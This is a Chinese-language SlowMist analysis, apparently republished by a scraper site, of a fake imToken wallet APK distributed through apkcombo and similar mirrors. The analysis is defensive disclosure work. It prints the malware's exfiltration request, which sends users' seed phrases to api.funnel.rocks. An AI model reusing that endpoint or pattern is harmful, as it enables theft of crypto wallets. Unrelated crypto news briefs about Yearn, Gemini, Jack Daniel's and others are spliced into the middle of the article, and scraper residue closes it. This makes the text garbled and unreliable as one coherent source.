Web3 假钱包第三方源调查分析:如何甄别网络钓鱼攻击?_WEB:Web3Gold

慢雾安全团队建议使用钱包、交易所时请认准官方下载渠道并从多方进行验证。

原文:https://foresightnews.pro/article/h5Detail/31716

作者:山&耀

转自:ForesightNews

背景

基于区块链技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。

当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包「登录」;这与我们传统意义上的「登录」不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行「登录」,我们可以看到「登录」钱包时显示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而钱包是你在Web3世界中的唯一通行证。

Yearn:yUSDT代币合约中漏洞存在于多个版本,下游协议的流动性提供者仍受影响:4月14日消息,Yearn Finance在推特上发布攻击事件调查进展,称如之前所诉,Yearn被攻击的根本原因是遗留在iEarn USDT (yUSDT) 代币合约中的漏洞。这个漏洞存在于多个版本中,并导致多个Curve池(y、busd、pax)被利用和耗尽。将LP代币存入下游协议的流动性提供者仍然受到影响,这包括封装这些受影响的LP的Yearn v2保险库 (2)和旧版v1保险库(2)的用户。在之前的推文中,Yearn表示,当前版本Yearn v2 Vaults不受影响。

此前昨日消息,Yearn Finance项目遭受攻击,黑客获利超1000万美元。[2023/4/14 14:03:24]

俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。

1,499枚BTC从未知钱包转移到Gemini:金色财经报道,Whale Alert数据显示,1,499枚BTC (约28,828,758美元) 从未知钱包转移到Gemini。[2022/10/23 16:35:55]

在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?

网站分析

鉴于下载途径众多,我们今天以apkcombo为例看看,apkcombo是一个第三方应用市场,它提供的应用据官方说大部分来源于其他正规应用商店,但事实是否真如官方所说呢?

杰克·丹尼威士忌已提交元宇宙、NFT相关商标申请:金色财经报道,NFT和元宇宙商标律师Michael Kondoudis发推称,全球威士忌品牌杰克·丹尼(Jack Daniels)已于9月13日向美国专利商标局(USPTO)提交元宇宙、NFT相关商标申请,将涵盖NFT认证数字媒体、虚拟饮料、酒吧用品和服装、数字钱包和收藏品。[2022/9/20 7:07:08]

我们先看下apkcombo的流量有多大:

据数据统计站点similarweb统计,apkcombo站点:

全球排名:1,809国家排名:7,370品类排名:168我们可以看到它的影响力和流量都非常大。它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W:

Web3金融服务初创公司Fiat Republic完成250万美元融资,Credo Ventures领投:6月8日消息,Web3金融服务初创公司Fiat Republic宣布完成250万美元种子轮+融资,本轮融资由Credo Ventures领投,Soft Bank Investment Advisers旗下Emerge Program、Connect Ventures、以及来自其他战略加密平台投资者和天使人参投。

Fiat Republic拥有一个专业的银行即服务(BaaS)平台,该公司的愿景是在Web3和传统银行之间架起一座桥梁,该公司已经通过收购Paybase Limited获得了英国EMI(电子货币机构)身份,可以为英国加密平台提供支付服务并发行电子货币。[2022/6/9 4:11:37]

那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:https://play.google.com/store/apps/details?id=im.token.app

曹寅分享2022年值得关注的六大Web3投资主题:12月29日消息,数字文艺复兴基金会董事总经理曹寅分享自己认为2022年值得关注的几大Web3投资主题:

1. 加密人作为一个重要消费群体。可以关注帮企业赚加密用户钱的项目。

2. DAO的公司化,公司的DAO化。可以关注(伟大的)DAO本身、DAO基础设施。

3. 南美、非洲、东南亚的Web3社区的崛起。可以关注以上地区的社区型项目/门户型项目。

4. Opensea的竞争者、颠覆者。可以关注OS的直接竞品,比如Rarible、LooksRare,以及未上线竞品,也包括其他链上竞品;垂直赛道竞品的平台化,比如正平台化的SuperRare、KnownOrigin。

5. 音乐NFT。可以关注高质量音乐平台,比如Pianity。

6. Web2金融企业的DeFi试验。可以关注同Web2金融合作,并有积极进展的DeFi项目,比如同美国头部Web2金融Current合作的Acala Network。[2021/12/29 8:11:37]

由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。而apkcombo镜像站的下载路径为:https://apkcombo.com/downloader/#package=im.token.app

上图我们可以发现,apkcombo提供的版本为24.9.11,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。

在编写本文时imToken钱包的最新版本为2.11.3,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。

如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如:uptodown下载地址:https://imtoken.br.uptodown.com/android

我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:

钱包分析

在之前我们已经分析过不少假钱包的案例,如:2021-11-24我们披露:《慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。

我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:

根据逆向APK代码和实际分析流量包发现,助记词发送方式:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

看下图,最早的「api.funnel.rocks」证书出现在2022-06-03,也就是攻击开始的大概时间:

俗话说一图胜千言,最后我们画一个流程图:

总结

目前这种局活动不仅活跃,甚至有扩大范围的趋势,每天都有新的受害者受。用户作为安全体系最薄弱的环节,应时刻保持怀疑之心,增强安全意识与风险意识,当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。

同时,如需使用钱包,请务必认准以下主流钱包App官方网址:

imToken钱包:https://token.im/TokenPocket钱包:https://www.tokenpocket.pro/TronLink钱包:https://www.tronlink.org/比特派钱包:https://bitpie.com/MetaMask钱包:https://metamask.io/TrustWallet:https://trustwallet.com/请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。

致谢:感谢在溯源过程中imToken官方提供的验证支持。

由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。

?

郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。

金智博客

[0:31ms0-3:278ms